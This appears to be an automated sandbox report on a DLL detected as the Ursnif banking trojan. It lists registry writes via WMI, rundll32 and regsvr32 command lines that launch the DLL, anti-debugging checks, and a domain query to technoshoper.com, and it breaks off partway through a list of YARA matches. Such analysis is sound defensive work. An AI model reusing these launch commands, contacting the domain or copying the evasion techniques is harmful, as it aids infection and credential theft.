Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: 2W6FcgEeMy.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA27A0	0_2_6EDA27A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDACE83	0_2_6EDACE83
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA3010	0_2_6EDA3010
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA1000	0_2_6EDA1000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA27A0	2_2_6EDA27A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDACE83	2_2_6EDACE83
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA3010	2_2_6EDA3010
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA1000	2_2_6EDA1000

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6EDA4B70 appears 32 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6EDA4B70 appears 32 times

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: 2W6FcgEeMy.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2W6FcgEeMy.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2W6FcgEeMy.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6068 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2W6FcgEeMy.dll,adqehmqaggtoqofda
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2W6FcgEeMy.dll,awkikcxxkllcr
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2W6FcgEeMy.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2W6FcgEeMy.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2W6FcgEeMy.dll,adqehmqaggtoqofda	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2W6FcgEeMy.dll,awkikcxxkllcr	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll",#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6068 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{EBFDF002-4B97-11EC-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF7F454687EFA0D2F9.TMP

Jump to behavior

Source: classification engine

Classification label: mal80.troj.evad.winDLL@17/115@14/4

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 2W6FcgEeMy.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2W6FcgEeMy.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2W6FcgEeMy.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2W6FcgEeMy.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2W6FcgEeMy.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2W6FcgEeMy.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 2W6FcgEeMy.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 2W6FcgEeMy.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 2W6FcgEeMy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2W6FcgEeMy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2W6FcgEeMy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2W6FcgEeMy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2W6FcgEeMy.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA4170 push ecx; ret		0_2_6EDA4183
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA4170 push ecx; ret		2_2_6EDA4183

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2W6FcgEeMy.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.1197864565.000000000531B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191135621.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1207204484.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174643571.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174822203.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191409157.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174672667.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174877788.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188941851.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191287733.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191167902.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189311900.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191103742.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174724933.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191264405.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189232893.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191197340.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188897799.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174847210.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189190747.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174861431.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189102105.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191219624.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188997373.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1175009445.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189042017.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.49194a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4fb94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4fb94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.710000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.49194a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fa0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.19794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.19794a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fd0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1340000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fa0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1100000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1100000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1204664213.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1204064655.00000000006F0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1206945247.0000000004919000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1208151025.0000000004FB9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1206904709.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1204058262.00000000006E0000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1204595185.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1206985280.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1206433585.0000000001979000.00000004.00000040.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA23D0 FindNextFileA,FindClose,FindFirstFileA,FindFirstFileA,FindNextFileA,SetFilePointer,CreateFileA,CloseHandle,ReadFile,CreateFileA,CreateFileA,SetFilePointer,GetLastError,SetFilePointer,GetLastError,ReadFile,ReadFile,CloseHandle,CreateFileA,FindNextFileA,	0_2_6EDA23D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA6F26 FindFirstFileExW,	0_2_6EDA6F26
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA23D0 FindNextFileA,FindClose,FindFirstFileA,FindFirstFileA,FindNextFileA,SetFilePointer,CreateFileA,CloseHandle,ReadFile,CreateFileA,CreateFileA,SetFilePointer,GetLastError,SetFilePointer,GetLastError,ReadFile,ReadFile,FindCloseChangeNotification,CreateFileA,FindNextFileA,	2_2_6EDA23D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA6F26 FindFirstFileExW,	2_2_6EDA6F26

Source: loaddll32.exe, 00000000.00000002.1205312193.000000000137C000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.1191440529.0000000000975000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: loaddll32.exe, 00000000.00000002.1205631042.00000000013C4000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.1191440529.0000000000975000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EDA3F9D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6EDA3F9D

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA2ED0 mov eax, dword ptr fs:[00000030h]	0_2_6EDA2ED0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA567B mov eax, dword ptr fs:[00000030h]	0_2_6EDA567B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA3380 mov eax, dword ptr fs:[00000030h]	0_2_6EDA3380
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA3380 mov eax, dword ptr fs:[00000030h]	0_2_6EDA3380
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA6835 mov eax, dword ptr fs:[00000030h]	0_2_6EDA6835
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA2ED0 mov eax, dword ptr fs:[00000030h]	2_2_6EDA2ED0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA567B mov eax, dword ptr fs:[00000030h]	2_2_6EDA567B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA3380 mov eax, dword ptr fs:[00000030h]	2_2_6EDA3380
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA3380 mov eax, dword ptr fs:[00000030h]	2_2_6EDA3380
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA6835 mov eax, dword ptr fs:[00000030h]	2_2_6EDA6835

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EDA863C GetProcessHeap,

0_2_6EDA863C

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA3AC4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6EDA3AC4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA3F9D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6EDA3F9D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EDA6868 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6EDA6868
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA3AC4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6EDA3AC4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA3F9D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6EDA3F9D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6EDA6868 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6EDA6868

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe

Domain query: technoshoper.com

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2W6FcgEeMy.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.1206671337.0000000002600000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1207568778.0000000003570000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1206697174.0000000003180000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.1206804127.0000000003620000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1206671337.0000000002600000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1207568778.0000000003570000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1206697174.0000000003180000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.1206804127.0000000003620000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1206671337.0000000002600000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1207568778.0000000003570000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1206697174.0000000003180000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.1206804127.0000000003620000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1206671337.0000000002600000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1207568778.0000000003570000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1206697174.0000000003180000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.1206804127.0000000003620000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EDA4187 cpuid

0_2_6EDA4187

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EDA3BE6 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6EDA3BE6

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.1197864565.000000000531B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191135621.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1207204484.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174643571.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174822203.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191409157.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174672667.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174877788.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188941851.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191287733.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191167902.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189311900.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191103742.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1206556297.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174724933.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191264405.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189232893.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191197340.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188897799.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174847210.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189190747.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174861431.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189102105.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191219624.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1188997373.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1175009445.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189042017.0000000002258000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.49194a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4fb94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4fb94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.710000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.49194a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fa0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.19794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.19794a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fd0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1340000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2fa0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1100000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.1100000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1204664213.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1204064655.00000000006F0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1206945247.0000000004919000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1208151025.0000000004FB9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1206904709.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1204058262.00000000006E0000.00000004.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1204595185.00000000010F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1206985280.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1206433585.0000000001979000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.1197864565.000000000531B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1174702628.0000000005498000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191239094.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1191135621.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1207204484.0000000004F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1189899566.0000000002258000.00000004.00000040.sdmp, type: MEMORY
